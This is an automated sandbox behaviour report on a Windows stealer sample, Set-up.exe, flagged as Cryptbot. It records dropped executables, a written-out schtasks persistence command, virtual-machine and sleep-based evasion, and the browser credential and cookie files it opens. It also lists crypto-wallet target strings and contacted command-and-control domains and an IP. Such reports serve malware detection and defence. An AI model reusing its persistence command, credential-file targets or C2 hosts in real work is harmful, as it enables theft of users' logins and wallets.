Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C980452 push eax; mov dword ptr [esp], ebx 5_2_6C98048A
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C9D0460 push eax; mov dword ptr [esp], ebx 5_2_6C9D07FF
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C98A527 push eax; mov dword ptr [esp], ebx 5_2_6C98A53B
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C961AAA push eax; mov dword ptr [esp], ebx 5_2_6CA16622
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C961AAA push eax; mov dword ptr [esp], ebx 5_2_6CA16622
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C98A6F7 push eax; mov dword ptr [esp], ebx 5_2_6C98A70B
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C966098 push eax; mov dword ptr [esp], ebx 5_2_6CA16622
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C9940D5 push ecx; mov dword ptr [esp], ebx 5_2_6C9940E9
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C966003 push eax; mov dword ptr [esp], ebx 5_2_6CA16AF6
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C966003 push edx; mov dword ptr [esp], edi 5_2_6CA16B36
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C9881E5 push edx; mov dword ptr [esp], ebx 5_2_6C9881F9
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C980290 push eax; mov dword ptr [esp], ebx 5_2_6C98048A
Drops PE files
Source: C:\Users\user\Desktop\Set-up.exe File created: C:\Users\user\AppData\Local\Temp\NrIpUDVFuuHZveDEtrIh.dll Jump to dropped file
Source: C:\Users\user\Desktop\Set-up.exe File created: C:\Users\user\AppData\Local\Temp\service123.exe Jump to dropped file

Boot Survival
barindex
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\user\Desktop\Set-up.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
Source: C:\Users\user\Desktop\Set-up.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Found evasive API chain (may stop execution after checking mutex)
Source: C:\Users\user\AppData\Local\Temp\service123.exe Evasive API call chain: CreateMutex,DecisionNodes,Sleep
Found stalling execution ending in API Sleep call
Source: C:\Users\user\AppData\Local\Temp\service123.exe Stalling execution: Execution stalls by calling Sleep
Contains capabilities to detect virtual machines
Source: C:\Users\user\Desktop\Set-up.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\AppData\Local\Temp\service123.exe Window / User API: threadDelayed 809 Jump to behavior
Found large amount of non-executed APIs
Source: C:\Users\user\AppData\Local\Temp\service123.exe API coverage: 1.1 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\Set-up.exe TID: 7764 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 8152 Thread sleep count: 809 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 8152 Thread sleep time: -80900s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Users\user\AppData\Local\Temp\service123.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\service123.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\Documents\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Temp Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user Jump to behavior
Source: Set-up.exe, 00000000.00000003.1526374059.000000000D25B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696497155j
Source: Set-up.exe Binary or memory string: VMware
Source: Set-up.exe, 00000000.00000003.1526374059.000000000D25B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696497155
Source: Set-up.exe, 00000000.00000003.1526374059.000000000D25B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696497155t
Source: Set-up.exe, 00000000.00000003.1526374059.000000000D25B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
Source: Set-up.exe Binary or memory string: navigatoradatwofactor.xlsbackupsOfficeXuanZhi9OriginmailGraphicsCachexrpWebStorageToastNotificationManagerCompatService WorkerejbalbakoplchlghecdalmeeeajnimhmLGHUBstremiotokencoinMetro\aholpfdialjgjfhomihkjbmgjidlcdnoVisual Studio SetupDropbox.jpgproductionMacromedia.txtLocal StorageCiscoSparkLauncherFACEITuser_dataUTC--2slobs-clientpkgsvcpkg.ElectrumpreferencesAutoHotkeyOlk\SlackEOS-Webcam-UtilitynavigationZWSOFTProcess Hacker 2avaxClickUpBlueStacks XReasonLabs\Blizzarduser_data#2carteira.IdentityService.jappsrvPicturesUXPWindows Server 2012 %wSwallet.datTerminalUpdateResourcenlbmnnijcnlegkjjpcfjclmcfggfefdmbilletera.pwdHotta\optimization_guide_prediction_model_downloadsPowerPointclaveswapiTop PDFSegmentation Platformthumbnailsdoge.pdfCaphyonWindows StoreEpsonSession StorageCanonbinanceViberdaidotContent-Type: multipart/form-data; boundary=----Boundary%lucom.adobe.dunamisUbisoftcodeDisc_Soft_FZE_LLCVodafoneElevatedDiagnosticscacheklnaejjgbibmhlephnhpmaofohgkpgkdBGAHelperLibCredentials.weasisUniSDKegjidjbpglichdcondbcbdnbeeppgdphPackages%d x %defbglgofoippbgcjepnhiblaibcnclgkAdguard_Software_Limited%.2f MB (%.2f GB)hdokiejnpimakedhajhdlcegeplioahdUserBenchmarkformhistory.sqliteFPSChessticketfactorIdentityCachedotnetsrcMotABBYY...Iq-TeamreposDocumentsVirtualBoxAuthcookies.sqlite.ipythonTikTok LIVE StudiointegrationsExodus\MessengerBlendCitraIntel(R)2FAEdgeUpdate360TotalSecurityFlash Playerbalena-etcherAdguard Software LimitedbhhhlbepdkbapadjdnnojkbgioiodbicUnrealEngineDropboxElectronCrashReportsAutoItGraineRealPlayerEpicGamesLauncher\.anacondaHoYoverse\ljfoeinjpaedjfecbmggjgodbgkmjkjkApkProjectsOneAuthConfigToolbarwindowParams.jsonmcohilncbfahbmgdjkbpemcciiolgcgeNetworklinkChaveshared_proto_dbPC HelpSoft Driver Updaterexodus.walletDownloaded InstallationsAMS SoftwarechainookjlbkiijinhpmnjffcofjonbfbgaocDiagnosticsMetaQuotesWindows Server 2012 R2 %wSuser_data#32 FAWindows Live ContactsNVIDIA Corporation\fhmfendgdocmcbmfikdcogofphimnknoAdobejaxSupportAshampoo.android.docbackuptrxApplicationInsightsLibraryWebTorrentarduino-ideGitKrakensidMPC-HCtbs_cache\microAppstronWinRARTerminal Server ClientTencentlogins.jsonAviraportefeuillehpglfhgfnhbgpjdenjgmdgoeiappaflndaoCanva.kdbcanva-updaterNotiondeemix MusicClassicShellkkpllkodjeloidieedojogacfhpaihohbhghoamapcdpbohphigoooaddinpkbaisecretdictionariesVMwarebtcLocal StoreGitHub DesktopPanasonicSidify Music ConverterMSOIdentityCRL.jpegusdblockNeteasehtxsentryFavoritesJDownloader 3.0XamarinTemplate.rtfJDownloader 2.0CorelCiscoSparkbitNotepad++SYACMPC-BERealNetworkswebview2uTorrentExcelAutodeskMegaDownloaderwebviewatomDriverPack NotifiercachesTesterAndroiddexEBWebView.condaMovavi Video ConvertergameAIMPSenhadmkamcknogkgcdfhhbddcghachkejeapMovaviAdaware.jdksPhotoScapeXPro.pngSilhouette AmericaupdatesClcriptReadyForindexWindows 7 %wSexchangeLogitechEADesktopPhotoWorksNeroPsiphon3StreamingVideoProviderVideoDecodeStatsBlackmagic DesigncjelfplplebdjjenllpjcblmjkfcffnePower BI Desktopapp.jsonOverwolfXuanZhikey4.dbUI
Source: Set-up.exe, 00000000.00000002.1992343702.000000000079E000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1484449204.00000000007F5000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1992343702.00000000007F4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Set-up.exe, 00000000.00000003.1526374059.000000000D25B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696497155]
Source: Set-up.exe, 00000000.00000003.1526374059.000000000D25B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696497155|UE
Source: Set-up.exe, 00000000.00000003.1526374059.000000000D25B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696497155o
Source: Set-up.exe, 00000000.00000003.1526374059.000000000D25B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155
Source: Set-up.exe, 00000000.00000003.1526374059.000000000D25B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
Source: Set-up.exe, 00000000.00000003.1526374059.000000000D25B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696497155x
Source: Set-up.exe, 00000000.00000003.1526374059.000000000D25B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696497155
Source: Set-up.exe, 00000000.00000003.1526374059.000000000D25B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696497155h
Source: Set-up.exe, 00000000.00000003.1526374059.000000000D25B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
Source: Set-up.exe, 00000000.00000003.1526374059.000000000D25B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
Source: Set-up.exe, 00000000.00000003.1526374059.000000000D25B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696497155d
Source: Set-up.exe, 00000000.00000003.1526374059.000000000D25B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696497155x
Source: Set-up.exe, 00000000.00000003.1526374059.000000000D25B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696497155
Source: Set-up.exe, 00000000.00000003.1526374059.000000000D25B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696497155
Source: Set-up.exe, 00000000.00000003.1526374059.000000000D25B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696497155
Source: Set-up.exe, 00000000.00000003.1526374059.000000000D25B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
Source: Set-up.exe, 00000000.00000003.1526374059.000000000D25B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696497155}
Source: Set-up.exe, 00000000.00000003.1526374059.000000000D25B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
Source: Set-up.exe, 00000000.00000003.1526374059.000000000D25B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696497155u
Source: Set-up.exe, 00000000.00000003.1484449204.00000000007F5000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1992343702.00000000007F4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWGv
Source: Set-up.exe, 00000000.00000003.1526374059.000000000D25B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696497155f
Source: Set-up.exe, 00000000.00000003.1526374059.000000000D25B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696497155
Source: Set-up.exe, 00000000.00000003.1526374059.000000000D25B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
Source: Set-up.exe, 00000000.00000003.1526374059.000000000D25B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696497155t
Source: Set-up.exe, 00000000.00000003.1526374059.000000000D25B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696497155s
Source: Set-up.exe, 00000000.00000003.1526374059.000000000D25B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696497155}
Source: Set-up.exe, 00000000.00000003.1526374059.000000000D25B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
Source: Set-up.exe, 00000000.00000003.1526374059.000000000D25B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696497155x
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_00668230 LoadLibraryA,GetProcAddress,FreeLibrary,GetLastError, 5_2_00668230
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_0066116C Sleep,Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm,GetStartupInfoA,_cexit,_initterm,exit, 5_2_0066116C
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_00661160 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv, 5_2_00661160
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_006611A3 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv, 5_2_006611A3
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_006613C9 SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm, 5_2_006613C9
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\Set-up.exe Process created: C:\Users\user\AppData\Local\Temp\service123.exe "C:\Users\user\AppData\Local\Temp\service123.exe" Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f Jump to behavior
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C9C8280 cpuid 5_2_6C9C8280
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Users\user\Desktop\Set-up.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
AV process strings found (often used to terminate AV products)
Source: Set-up.exe, 00000000.00000002.1992343702.000000000080A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 123.exe

Stealing of Sensitive Information
barindex
Yara detected Clipboard Hijacker
Source: Yara match File source: 5.2.service123.exe.6c940000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000003.1976708415.0000000003BDE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Set-up.exe PID: 7652, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: service123.exe PID: 8148, type: MEMORYSTR
Yara detected Cryptbot
Source: Yara match File source: Process Memory Space: Set-up.exe PID: 7652, type: MEMORYSTR
Found many strings related to Crypto-Wallets (likely being stolen)
Source: Set-up.exe String found in binary or memory: Electrum
Source: Set-up.exe String found in binary or memory: \ElectronCash\wallets
Source: Set-up.exe, 00000000.00000002.1993669524.000000000193B000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: .node-redOnDeviceHeadSuggestModel\Exodus\backupExodus backup\MultiBitHDMultiBit HD\Electrum\wallets\ElectronCash\walletsElectron Cash\Electrum-btcp\walletsElectrum BTCP\walletsUnknown Wallet (Folder - wallets)Android Open Source Project\Emulator\Movavi Video EditorVS Revo GroupSolidDocumentsSteamCachedData.vscodeCodeMEGAsyncISL Online CacheLogiShrdMega LimitedAVGBrowser.exeHP_Easy_StartmainXpomPowerISOPicWishHabbo LauncherSmartSteamEmukey3.dbsignons.sqliteTechSmithWildTangentWindows ServicesHP Active HealthNVIDIADigiartyuTorrent WebiCloudDriveJxBrowsertastytradewebcachePublishersSquirrelTempMedia Player@
Source: Set-up.exe String found in binary or memory: \com.liberty.jaxx
Source: Set-up.exe String found in binary or memory: \Exodus\backup
Source: Set-up.exe String found in binary or memory: exodus
Source: Set-up.exe String found in binary or memory: Ethereum (UTC)
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\key4.db Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqlite Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: Process Memory Space: Set-up.exe PID: 7652, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Cryptbot
Source: Yara match File source: Process Memory Space: Set-up.exe PID: 7652, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1523427 Sample: Set-up.exe Startdate: 01/10/2024 Architecture: WINDOWS Score: 100 28 elevenvx11pn.top 2->28 36 Suricata IDS alerts for network traffic 2->36 38 Found malware configuration 2->38 40 Yara detected Clipboard Hijacker 2->40 42 5 other signatures 2->42 8 Set-up.exe 4 2->8         started        13 service123.exe 2->13         started        15 service123.exe 2->15         started        signatures3 process4 dnsIp5 30 elevenvx11pn.top 185.244.181.140, 49706, 49708, 49709 BELCLOUDBG Russian Federation 8->30 24 C:\Users\user\AppData\...\service123.exe, PE32 8->24 dropped 26 C:\Users\user\...26rIpUDVFuuHZveDEtrIh.dll, PE32 8->26 dropped 44 Found many strings related to Crypto-Wallets (likely being stolen) 8->44 46 Uses schtasks.exe or at.exe to add and modify task schedules 8->46 48 Tries to harvest and steal browser information (history, passwords, etc) 8->48 50 Drops large PE files 8->50 17 service123.exe 8->17         started        20 schtasks.exe 1 8->20         started        file6 signatures7 process8 signatures9 32 Found evasive API chain (may stop execution after checking mutex) 17->32 34 Found stalling execution ending in API Sleep call 17->34 22 conhost.exe 20->22         started        process10
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
185.244.181.140
 elevenvx11pn.top Russian Federation
44901 BELCLOUDBG true

Contacted Domains

Name IP Active
elevenvx11pn.top 185.244.181.140 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
zx11pn.top true
    		unknown
    analforeverlovyu.top true
    • URL Reputation: safe
    		 unknown
    |Xl@elevenvx11pn.top true
      		unknown
      elevenvx11pn.top true
        		unknown
        ~elevenvx11pn.top true
          		unknown